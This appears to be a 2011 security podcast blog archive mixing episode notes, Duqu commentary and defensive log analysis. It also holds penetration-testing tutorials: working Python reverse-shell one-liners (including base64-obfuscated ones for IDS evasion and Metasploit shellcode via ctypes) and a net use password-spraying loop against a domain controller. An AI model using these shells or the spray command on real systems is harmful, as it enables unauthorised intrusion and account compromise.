In this episode we talk about the 12 hour marathon, SSL and how hackers are trying to be more like classic 80's movies.
Links for this episode:
Video Feeds: 
October 2011 Archives
Reading this article was an exercise in frustration. Mass SQL Injection Attack Hits 1 Million Sites. The sum of it is that over a million ASP.Net websites were written and put online after someone had deliberately disabled input validation. This isn't an insecure default. Folks turned off the security feature on purpose!
I've worked on a lot of software projects and can picture what probably happened all too well. Someone was working on some piece of the web application and ran into a validation error when testing the site. Maybe they had a deadline coming up, or just gave up figuring the problem out. Hopefully it wasn't a case where they just didn't care. The end result was rather than figure out what triggered the issue and work through it, someone brought up the idea of turning off the validation.
It was a small change. Just flip this:
<%@ Language="C#" ValidateRequest="true" %>
to this:
<%@ Language="C#" ValidateRequest="false" %>
Hey it works! At least until they got owned. Then it was lots of stress, work and fear of unemployment.
This not a problem limited only to ASP.Net developers. Think back and remember the times that a firewall rule was set to default permit because someone was in a hurry. Or the time that someone got frustrated figuring out file system permissions and gave the Everyone group Full Control to a directory. Or worse, set that daemon to run as root. It happens and it's all too tempting while in full firefighting mode or coming up on a deadline. But is it really worth it? Or do we find out later that the Easy Button really was the wrong one?
Take some time and save yourself or co-workers the grief. Resist the urge to push the Easy Button and don't give an attacker an easy shot.
There's been a lot of chatter this week about Duqu and what it's actually aimed at accomplishing. I started off with Darren's link in the show notes to a Network World article titled "Symantec, McAfee differ on Duqu threat". After spending some time reading through different articles I focused on three by Symantec, McAfee and Kaspersky that had very different takes on Duqu. The links for each are below. It seems that there is some agreement on characteristics of Duqu, but a lot less on what it is aimed at doing.
First, here's what Symantec, McAfee and Kaspersky agreed on.
Duqu is Stuxnet related. Symantec stated that the authors had access to the Stuxnet source code. McAfee said that it was the Stuxnet team because it attacked small certificate authorities in the "Canis Aureus" region. Oh, and the code of Duqu was Stuxnet related. (Their order, not mine.) Kaspersky simply stated that the code and functionality was similar and let it go at that.
One of the Duqu files were signed drivers purporting to be C-Media Electronics. McAfee called these "stolen digital certificates". VeriSign revoked the certificate for this driver on October 14, 2011. Other drivers were note signed.
Symantec and McAfee agree remote access and key logging are two of its capabilities. Kaspersky only mentioned the keylogger.
But then we get to what its actually for...
Symantec states that Duqu's purpose is "gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party." The main payload is for general remote access.
McAfee also says that it is aimed at espionage and "targeted attacks against sites such as Certificate Authorities (CAs)." At the end of their article they issued a warning specific to CAs to carefully check their systems.
Kaspersky took a different approach and didn't take a guess Duqu's purpose. Instead they gave information about the four Duqu drivers that they have, stated that they only had one confirmed infection (as of Oct 20, 2011) and they were continuing to investigate.
Between the three articles there is information that could be used to look for signs of Duqu on your hosts. File names, driver names and versions. HTTP and HTTPS used for communications. JPG files used as the data transfer method. The full paper from Symantec also includes registry paths that we could look for. However, these are only from the files that they have discovered so far. So while we have a bit of information to start checking our systems with, what it does is still a bit of a debate.
Links:
Symantec - W32.Duqu: The Precursor to the Next Stuxnet
Symantec's full paper on Duqu
McAffee - The Day of the Golden Jackal - The Next Tale in the Stuxnet Files: Duqu
Kaspersky - The Mystery of Duqu - Part One
Fox News - Stuxnet Clone 'Duqu': The Hydrogen Bomb of Cyberwarfare? Nothing like a little hyperventilation to make it interesting.
In this edition we discuss sheep, the TDL4 root kit, and the RSA attacks… Because we just can't get enough of that APT good stuff!
Links for this episode:
Video Feeds:
This Friday, October 28th, we'll be broadcasting live a special 12 hour podcast - Episode 265 with very special guests Johnny Long, Kevin Mitnick, Marcus Ranum, and a plethora of other awesome folks. The live stream will be broadcast at 10:00 AM EDT and our drive for Hackers for Charity will be in full effect until the mics are turned off sometime around 10:00 PM EDT that night.
Episode 265 is dedicated to raising both awareness of, and funds for, Johnny Long's excellent organization Hackers for Charity.
The HFC group:
- Feeds children through a "food for work" program.
- Builds computer labs to help students learn skills and land jobs that are key to disrupting poverty's vicious cycle.
- Provides technical assistance to charities that can't afford IT services.
- Furnishes job experience and references to the Ugandan volunteers.
You can get more involved via their website, or simply click the donate button below.
Participate in our IRC channel or sit back and enjoy it live via the link below:
NOTE: The video will play the most recent show up until we are live!
Part 1 - Interview with Mike Poor and Tom Liston:
Part 2 - Drunken Security News:
Episode 264 Part 1 Direct Audio Download
Episode 264 Part 2 Direct Audio Download
Episode Hosts:
Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.
Audio Feeds:
Video Feeds:
You have remote command execution on a linux web server. Your normal tricks for getting a shell don't work but you know that the system has a fully functional python interpreter. In order to make your attack work you need to put the entire attack into a single command line passed to a python interpreter with the -c option. Here are a few python based one liners that can be executed with the -c option and tips for creating additional shells. Each of these examples shovel a shell to localhost. Start up a netcat listener to receive the shell ($nc -l -p 9000) before launching these sample attacks.
First we start out with a simple python reverse tcp connect shell like this one.
import socket
import subprocess
s=socket.socket()
s.connect(("127.0.0.1",9000))
while 1:
p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(p.stdout.read() + p.stderr.read())
Then we try to collapse it down to one line by separating the existing lines with semicolons. That is simple enough, but there is a problem. Python relies on spacing to indicate the start and end of a code block. The while loop doesn't want to collapse to a single line. But we can get it down to two lines.
>>> import socket;import subprocess ;s=socket.socket() ;s.connect(("127.0.0.1",9000))
>>> while 1: p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE); s.send(p.stdout.read() + p.stderr.read())If you keep the spacing straight and put those two lines into an interactive python session it works properly. As soon as you try to collapse the two lines with a semicolon you get a syntax error. The good news is you can get around that with the "exec" method. Python's exec method is similar to "eval()" in javascript and we can use it to interpret a script with "\n" (new lines) in it to separate the lines. Using this technique we get the following one line python shell.
markbaggett$ python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Setup a netcat listner on your localhost listening on port 9000 and this works very nicely. If we are going to use exec(), we might as well add a little IDS evasion to the mix and obscure our code. So lets drop into interactive python and encode our payload.
markbaggett$ python
Python 2.5.1 (r251:54863, May 5 2011, 18:37:34)
[GCC 4.0.1 (Apple Inc. build 5465)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> shellcode="import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())"
>>> shellcode.encode("base64")
'aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgo\nJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJl\nY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJw\ncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJl\nYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkp\n'
Next we take the base64 encoded version of our payload and exec() that with the decode() method to turn it back into our script source before execution. Our one liner becomes this:
markbaggett$ python -c "exec('aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgo\nJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJl\nY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJw\ncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJl\nYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkp\n'.decode('base64'))"
Now lets apply this technique to a python shells that executes a payload from the Metasploit framework such as the one I discussed on the SANS Penetration Testing Blog. With this technique I create a python script that executes a payload from the metasploit framework. In this example I'll use the osx reverse tcp shell. After grabbing the stage1 bytes from "$./msfpayload osx/x86/shell_reverse_tcp LHOST=127.0.0.1 C" ( see SANS blog ) I built the following python script.
from ctypes import *
reverse_shell = "\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80"
memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell))
shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p))
shellcode()
Spaces and carriage returns aren't a problem for this very simple script so with a few semicolons we get the following one liner. We don't need to use the "exec()" function since we don't need to interpret multiple lines.
root# python -c "from ctypes import *;reverse_shell = \"\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80\";memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell));shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p));shellcode()"
Before pressing enter on the shell above you will need to setup the framework multi/handler to receive the incoming shell.. This time the shell is connecting back to the default port of 4444 so we set it up as follows:
msf > use multi/handler
msf exploit(handler) > set payload osx/x86/shell_reverse_tcp
payload => osx/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(handler) > exploit[*] Started reverse handler on 127.0.0.1:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54471) at 2011-10-20 09:19:03 -0400id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1)
If you want to go back and add the exec() function to encode this payload and avoid IDS keep in mind your payload may contain ASCII representations of NULL (0x00) characters. In ASCII it is harmless, but once you encode it you may have trouble decoding it. If you want to encode that payload run your output through msfencode and use the -b option to eliminate null characters from your payload.
As an aside, it is worth noting that when you compile this to an exe with pyinstaller you create a python interpreter with an ASCII representation of your script it it. Today no antivirus software detects the ascii source code of Metasploit payloads as malicious. I'm just saying. There you go. Simple, but effective. :)
Tweets - @markbaggett
Join me and Ed Skoudis for SANS 560 Network Penetration Testing and Ethical Hacking vLive ! Starting January 10, 2012 (wow.. 2012 already) CLICK HERE for more information.
Posted by Dennis Antunes
Follow on Twitter! @antunesdennis
Ahh, intentionally vulnerable distros... What better way to sharpen the knives in the drawer while avoiding the orange jumpsuit?
In this post and the accompanying video, we'll get root on Kioptrix Lvl1. Sure it's been done before (search YouTube) but my goal here is not only to show you to take level one, but more importantly to show you how to organize your approach and processes so they scale beyond a single host as well as what to do once you do have root (pilfer and pivot).
This is how we do....
First: My attack platform is of course BT5. Why, because it has just about every tool you'll ever need and it just flat out rocks.
Second: Organization. Following a sound PT methodology, I like to map my activities to, and store the resulting raw data in, a unique workspace, per project. I first create a simple hierarchy of folders then blaze through them using the almighty screen. Ah screen, I truly love screen and you will too. I have @jabra to thank for initial the introduction about 7 years ago. If you fall in love you can thank me (pretty sure you will).
I use the following bash script and accompanying custom screenrc file to create a dedicated workspace for each new project. The script takes one argument, the top level directory to create. It creates this along with a number of subdirectories used for organizing collected data.
Third: The Repository: I use MSF as an attack platform, a payload encoder, and I would argue just as importantly, a repository. I input all my data: Nikto, nmap, nessus, etc. into MSF for easy perusal and retrieval. As you will see, I create a workspace for each new project, again for organization's sake.
Fourth: The Exploit: Often the easiest part if we've mapped our target properly. In the video I use the CVE Details site to look up potential exploits based on the service versions uncovered.
Fifth and finally: The pilfer and pivot. Because there is a single host here, we will focus on the pilfer, keeping in mind all good pivots start first with a good pilfer. I'll run my pilfer script for Linux (linkit.sh) which gathers just about all the info you will need to pivot from this host. This info also serves as an invaluable starting point in the event you are not root and need to escalate privileges.
Best viewed in fullscreen/HD:
Follow on Twitter! @antunesdennis
Ahh, intentionally vulnerable distros... What better way to sharpen the knives in the drawer while avoiding the orange jumpsuit?
In this post and the accompanying video, we'll get root on Kioptrix Lvl1. Sure it's been done before (search YouTube) but my goal here is not only to show you to take level one, but more importantly to show you how to organize your approach and processes so they scale beyond a single host as well as what to do once you do have root (pilfer and pivot).
This is how we do....
First: My attack platform is of course BT5. Why, because it has just about every tool you'll ever need and it just flat out rocks.
Second: Organization. Following a sound PT methodology, I like to map my activities to, and store the resulting raw data in, a unique workspace, per project. I first create a simple hierarchy of folders then blaze through them using the almighty screen. Ah screen, I truly love screen and you will too. I have @jabra to thank for initial the introduction about 7 years ago. If you fall in love you can thank me (pretty sure you will).
I use the following bash script and accompanying custom screenrc file to create a dedicated workspace for each new project. The script takes one argument, the top level directory to create. It creates this along with a number of subdirectories used for organizing collected data.
#!/bin/bash
function startscreen
{
sed -e s/changethis/"$TOPLVL"/g my_screenrc_template > my_screenrc
screen -c my_screenrc
}
if [ "$#" -ne 1 ]
then echo "You must specify a top level directory: $0 tld"
else
TOPLVL=$1
if [ -e /root/$TOPLVL ]
then echo "$1 exists. Starting screen anyway." \
&& sleep 2 && startscreen
else
mkdir /root/$TOPLVL
mkdir /root/$TOPLVL/exploits
mkdir /root/$TOPLVL/nmap_scans
mkdir /root/$TOPLVL/pilfering
mkdir /root/$TOPLVL/reporting
mkdir /root/$TOPLVL/webpen
mkdir /root/$TOPLVL/wordlists
startscreen
fi
fi
Using the default .screenrc, I simply appended the following lines and saved it off as my_screenrc_template. This file will be used by screen to initialize a number of different windows, each window starting in a different directory of the workspace. Note my get_organized.sh script generates a custom screenrc per project using this template. The relevant lines are below:
setenv TOPLVL /root/changethis chdir "$TOPLVL" screen -h 2000 -t SHELL chdir "$TOPLVL/nmap_scans" screen -h 2000 -t NMAP chdir "$TOPLVL/pilfering" screen -h 2000 -t PILFERING chdir "$TOPLVL/wordlists" screen -h 2000 -t WORDLISTS chdir "/pentest/exploits/exploitdb" screen -h 2000 -t EXPLOITDB chdir "$TOPLVL/exploits" screen -h 2000 -t EXPLOITS chdir "$TOPLVL/webpen" screen -h 2000 -t WEBPEN screen -h 2000 -t MSF msfconsole chdir "/ftphome" screen -h 2000 -t FTPHOME chdir "/srv/tftp" screen -h 2000 -t TFTP chdir "$TOPLVL/reporting" screen -h 2000 -t REPORTINGThis should make a lot more sense once you see the video.
Third: The Repository: I use MSF as an attack platform, a payload encoder, and I would argue just as importantly, a repository. I input all my data: Nikto, nmap, nessus, etc. into MSF for easy perusal and retrieval. As you will see, I create a workspace for each new project, again for organization's sake.
Fourth: The Exploit: Often the easiest part if we've mapped our target properly. In the video I use the CVE Details site to look up potential exploits based on the service versions uncovered.
Fifth and finally: The pilfer and pivot. Because there is a single host here, we will focus on the pilfer, keeping in mind all good pivots start first with a good pilfer. I'll run my pilfer script for Linux (linkit.sh) which gathers just about all the info you will need to pivot from this host. This info also serves as an invaluable starting point in the event you are not root and need to escalate privileges.
Best viewed in fullscreen/HD:
"Stuxnet and Duqu were created by the AV companies to eat the souls of children everywhere…"
But I may be paraphrasing…
That is all.
I wonder if this will drive traffic.
-strandjs
p.s. Paul, that is three cigars.
In this episode we discuss the children of Stuxnet, how a company came to their senses in Australia and how Google is switching to SSL.
Links for this episode:
Video Feeds:
A while ago, Dave Hoelzer did a nice video on how to use Windows PowerShell to hack domain user accounts. Basically, Dave leveraged PowerShell commands which any domain user can execute on a domain and receive either a positive and negative response based on the legitimacy of the username and password combination. This got me thinking. Since I'm not typically handed, or able to spawn, a PowerShell right from the get go, what else could I use to accomplish the same goal? The answer is attempting to connect to the IPC$ share of a domain controller. Using the following command, you can spray a huge list of domain users with a small number of passwords (to avoid lockout) and try to catch someone using something simple.
@FOR /F %n in (names.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\DC01 /user:mydomain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DC01\IPC$ > NUL
WARNING: Make sure the number of passwords in your file is less then that of the account lockout policy. Below is a small list that Carnal0wnage and Mubix reference in their recent DerbyCon talk. This list, along with the technique used above, gets you in just about anywhere.
HINT: For a list of all the users in a domain, conduct SID enumeration against null sessions with NBTEnum or Cain. While not always enabled, I rarely find null sessions disabled. If it is disabled, use typical info gathering techniques from open sources.
Here's another use for this technique. Brute forcing the domain default password by targeting Active, never logged in accounts. You get this information for each user when you enumerate the domain with Cain / NBTEnum as mentioned above. Essentially what you have is a long list of users, all with the same default password, since they have never logged in with their accounts. Normally, I wouldn't think this a viable vector of attack, but I recently encountered a situation where a domain had over 1000 Active, never logged in accounts, all with the same default password. No joke. What you would do is attempt several passwords (lockout - 1) from a list against each user. In the situation I encountered, the lockout was 3 and there were ~1000 Active user accounts that had never logged in. That's 1000 * (3 - 1) = 2000 attempts I could have made at guessing the default user password without fear of locking out any accounts! Really wish I would have done that now...
If you're looking for a single command which does this, look for it in a future episode of the Command Line Kung Fu blog.
Part 1 - Interview with Dave Porcello, CEO of Pwnie Express:
Part 2 - Interview with Rich Perkins and Mike Tassey on DIY UAVs:
Part 3 - Drunken Security News for the Week:
Episode 263 Part 1 Direct Audio Download
Episode 263 Part 2 Direct Audio Download
Episode 263 Part 3 Direct Audio Download
Episode Hosts:
Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.
Audio Feeds:
Video Feeds:
Welcome to another episode of Hack Naked TV.
In this episode we learn that being a good security researcher will not always be returned with kindness and respect. We learn that Joe Pesci may be a role model for how to run user awareness programs everywhere. And finally, we look at some SEC guidelines that will make lawyers everywhere smile.
Links for this episode:
Video Feeds:
UPDATE: We're changing our schedule to start at 6pm EDT! Look for us at our new time from now on.
Join us this Thursday night - we have longtime friend of the show and Inguardian Mike Poor stopping by again in Episode 264 to update us on his current projects.
Participate in our IRC channel or sit back and enjoy it live via the link below:
NOTE: The video will play the most recent show up until we are live!
Here is another great post from Doug Burks.
For the purposes of this blog post, "evil User Agents" could be truly
evil User Agents like "Bob's Evil Clown C&C Agent" or they could
simply be outdated and vulnerable browser software like
"Firefox/2.0.0.20".
Proxy
If you already proxy your outbound HTTP traffic, then this a trivial
exercise of just parsing your existing proxy logs. This is left as an
exercise to the reader, but the command-line kung-fu at the bottom of
this blog post may help you get started. If you don't already have a
proxy, read on for some other ideas.
WPAD
WPAD is Web Proxy Auto Discovery. By default, most browsers will
attempt to retrieve a proxy configuration file from a local WPAD
server. Even if you don't have a proxy server, you can create a
"wpad" A record in your internal DNS and point it at a web server
where you can monitor the logs. You don't have to add a proxy
configuration file to the web server, just let the clients request the
file and then query the web server logs for their User Agent strings.
This isn't a 100% solution as some malware may not try to connect to
WPAD. [1] [2]
httpry
If you can span or tap your outbound Internet traffic to a box running
the httpry utility [3], it will create logs very similar to a proxy
but without requiring any reconfiguration of your network or clients
[4] [5]. A recent update to Security Onion added httpry and
configured it to run on all monitored interfaces, so you can have full
IDS/NSM *and* searchable HTTP logs in one box [6].
httpry's output format is configurable. If you want just the client
IP and User Agent, you can configure httpry to log just those fields.
If running httpry in Security Onion, it logs in the following format:
timestamp,source-ip,source-port,dest-ip,dest-port,method,host,request-uri,referer,user-agent
(for uploading into Sguil [7]). We can use our old friends cut, awk,
sort, and uniq to pare this down to just client IP and User Agent to
produce an actionable report:
cut -f2,10 /nsm/sensor_data/*/httpry/`date +%Y-%m-%d`.log | awk '$2 != "-"' | sort | uniq -c |sort -nr
Let's break the command down:
cut -f2,10 /nsm/sensor_data/*/httpry/`date +%Y-%m-%d`.log
Security Onion stores its httpry logs in
/nsm/sensor_data/NAME_OF_SENSOR/httpry/YYYY-MM-DD.log (where
NAME_OF_SENSOR is the actual sensor name and YYYY-MM-DD is the actual
date). We can get today's date in YYYY-MM-DD format using the
backticked command `date +%Y-%m-%d`. So the full command extracts
fields 2 and 10 from today's log on all sensors on the box.
| awk '$2 != "-"'
Take the output from the cut command and remove lines where the User
Agent field is just a hyphen.
| sort | uniq -c |sort -nr
Take the output from the awk command, sort the logs by IP address and
collapse them into unique entries (giving a count of each unique entry
at the beginning of the line), and then sort in reverse numerical
format. This puts our User Agents with the highest amount of traffic
on top.
Here's some sample output:
2701 192.0.2.2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2)
AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
1024 192.0.2.8 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
992 192.0.2.3 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1
(KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
39 192.0.2.4 Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.9.2.23) Gecko/20110921 Ubuntu/10.04 (lucid) Firefox/3.6.23
78 192.0.2.4 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1
(KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
11 192.0.2.5 Roku/DVP-3.0 (013.00E02227A)
5 192.0.2.4 Wget/1.12 (linux-gnu)
3 192.0.2.4 Bob's Evil Clown C&C Agent
2 192.0.2.4 curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7
OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15
On the second line of the output, we see that 192.0.2.8 is running the
vulnerable Firefox 2.0.0.20 browser. On the next to last line of the
output, we find Bob's Evil Clown C&C Agent on 192.0.2.4.
[1] - http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
[2] - http://support.microsoft.com/kb/934864
[3] - http://dumpsterventures.com/jason/httpry/
[4] - http://taosecurity.blogspot.com/2008/06/logging-web-traffic-with-httpry.html
[5] - http://isc.sans.edu/diary.html?storyid=9295
[6] - http://securityonion.blogspot.com/2011/09/security-onion-20110922-now-available.html
[7] - http://www.pintumbler.org/Code/hafs
Join us for Episode 263 featuring an interview with Pwnie Express CEO Dave Porcello and the fine Do-it-yourself UAVers Rich Perkins & Mike Tassey from The Rabbit-Hole to discuss their Wireless Aerial Surveillance Platform.
Participate in our IRC channel or sit back and enjoy it live via the link below:
NOTE: The video will play the most recent show up until we are live!
In this episode we talk a lot about malware. We also talk about how traditional defenses are failing, and ladies… We have a smiling Spock.
Links for this episode:
To view all Hack Naked TV episodes, please visit http://hacknaked.tv
Video Feeds:
The crew talks about the stories for the week!
Episode 262 Part 2 Direct Audio Download
Episode Hosts:
Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.
Audio Feeds:
Video Feeds:
Charlie Miller, pwn2own champion, Interview:
Alessandro Acquisti Interview:
Episode 262 Part 1 Direct Audio Download
Episode Hosts:
Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.
Audio Feeds:
Video Feeds:
In this episode we talk about Monkey Football love, hot government on malware and malware on government action, how to do responsible disclosure over Twitter.
Links for this episode:
To view all Hack Naked TV episodes, please visit http://hacknaked.tv
Video Feeds:
Fresh on the heels of an updated iPhone, join us for Episode 262 with an interview of Pwn2Own winner & certified Apple hacker Charlie Miller and be sure to stick around for a guest technical segment with Alessandro Acquisti on Facial Recognition using Augmented Reality.
Participate in our IRC channel or sit back and enjoy it live via the link below:
NOTE: The video will play the most recent show up until we are live!
In this episode we talk about Holes in HTC and how it is much worse than you thought. We talk about Security Through Obscurity and How Linux was P0wned and what you can do about it.
Links for this episode:
To view all Hack Naked TV episodes, please visit http://hacknaked.tv
Video Feeds:
Brian Kennish on Facebook Privacy:
Paul and Jack bat around the stories for the week:
Episode 261 Direct Audio Download
Episode Hosts:
Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.
Audio Feeds:
Video Feeds:
In this episode we talk about pigs (three different ones), what CIOs think, more SSL and getting free passwords on used gear. Oh, yea. Google and Microsoft.. Ha! HA!
Links for this episode:
To view all Hack Naked TV episodes, please visit http://hacknaked.tv
Video Feeds: